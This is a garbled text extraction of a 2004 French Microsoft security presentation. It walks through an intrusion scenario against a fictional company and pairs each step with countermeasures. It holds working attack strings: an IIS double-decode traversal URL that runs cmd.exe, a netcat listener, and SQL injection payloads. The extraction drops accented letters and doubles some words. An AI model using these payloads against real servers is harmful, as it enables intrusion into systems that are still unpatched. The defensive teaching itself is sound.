Académique Documents
Professionnel Documents
Culture Documents
Important : les attaques faisant intervenir des vulnrabilits ont t choisies pour illustrer les propos, et font volontairement appel des vulnrabilits connues depuis plusieurs mois ou annes et dont les corrections sont disponibles et largement diffuses
Dmarche thorique
Renseignement Scanning numration Pntration lvation de privilge Accs interactif Nettoyage
dans la pratique :
numrer tout ce que lon peut (adresses, ports, services, OS, versions, utilisateurs) Tester toutes les vulnrabilits connues Contourner les protections, trouver la petite porte Casser les mots de passe Installer son rootkit Cacher ses traces
Scnario
JeanJean-Kevin fait un stage au service courrier chez PLA S.A. (Pieds de Lunettes Astronomiques) Il est mal pay Il a du temps Il apporte son PC portable et le branche sur le rseau.
2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
8/23/2011 8:57 PM
Rseau dcouvrir
Ping Sweep
Objectif : numrer les machines qui rpondent au Ping (ICMP Echo Request) Outils :
Ping (Windows) Nmap -sP (Fyodor, insecure.org) sl -n (ScanLine, ex-fscan de Foundstone) ex
Adresses et noms
MARS VENUS HALLEY
Port Scanning
Objectif : numrer les services prsents sur une machine (Ports TCP et UDP ouverts ) Outils :
Nmap (insecure.org) sl (Foundstone) SuperScan (Foundstone)
192.168.11.2
192.168.11.3
192.168.11.4
192.168.11.10
Services
MARS DC VENUS SMTP HTTP HTTPS HALLEY DC SQL
192.168.11.2
192.168.11.3
192.168.11.4
192.168.11.10
Outils :
nc (NetCat : @Stake) Nmap -sV -O
2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
8/23/2011 8:57 PM
Version des OS
MARS DC VENUS IIS HALLEY DC SQL W2000 192.168.11.4
numration NetBIOS
Objectifs : machines, domaines, contrleurs de domaine Outils : Name Service Type
Nbtstat Nbtscan
---------------------------------------CORP-DC <00> UNIQUE CORP-DC <20> UNIQUE CORP <00> GROUP CORP <1c> GROUP CORP <1b> UNIQUE CORP-DC <03> UNIQUE CORP <1e> GROUP INet~Services <1c> GROUP IS~CORP-DC <00> UNIQUE CORP <1d> UNIQUE ??__MSBROWSE__? <01> GROUP ADMIN <03> UNIQUE
W2000 192.168.11.2
W2000 192.168.11.3
Contr l r omaine
192.168.11.10
Utilisateur
2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
8/23/2011 8:57 PM
Approbation
DomA
DomB
2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
8/23/2011 8:57 PM
Pr SP3 :
http://server/scripts/..%255c..%255cwinnt/ http://server/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir
Exemples de commandes :
cmd.exe /c dir cmd.exe /c echo xxx >> fichier.asp
Mise en
Serveur IIS
uvre
(3) Ecoute : nc l p 2222
Contre mesures
Attaquant
Rpertoires web sur un volume spar IIS Lockdown (dsactivation composants inutiles, ACLs) + URLScan Application des correctifs de scurit (liste avec MBSA) Configurer le pare-feu et les stratgies pareIPsec pour ne laisser passer que les flux autoriss (source, destination, protocole, port) :
IIS SQL TCP 1433 TCP 80, 443
2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
8/23/2011 8:57 PM
Injection SQL
Non spcifique IIS, ni SQL Server Principe :
Requte SQL construite avec une entre de lutilisateur Exemple :
sqlCommand.CommandText = "Select title_id, "Select title, price From titles Where title like '%" + '%" TextBox1.Text + "%'"; "%'"; Select title_id, title, price From titles Where title like '%XXX%' '%XXX%' Select title_id, title, price From titles Where title like '%X' Or 1=1--%' '%X' 1=1--%' Select title_id, title, price From titles Where title like '%X' Union select 'A',name,0 from '%X' master..sysdatabases--%' master..sysdatabases--%'
Contre mesures
Scurit intgre Windows Mots de passe complexes Qualit du code (procdures stockes, requtes paramtres, validation des entres)
Conclusions
Erreur de manipulation de ladministrateur
Compte de test non dsactiv
Absence de patch
IIS double decode, rvlation de code (Blaster, Sasser)
Erreur de dveloppement
Buffer overflow Injection SQL / utilisation de trop de privilges CrossCross-site scripting
Ressources disponibles
Security Guidance Center http://www.microsoft.com/security/guidance/ Site Microsoft sur la scurit (tout public)
http://www.microsoft.com/france/securite/
2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.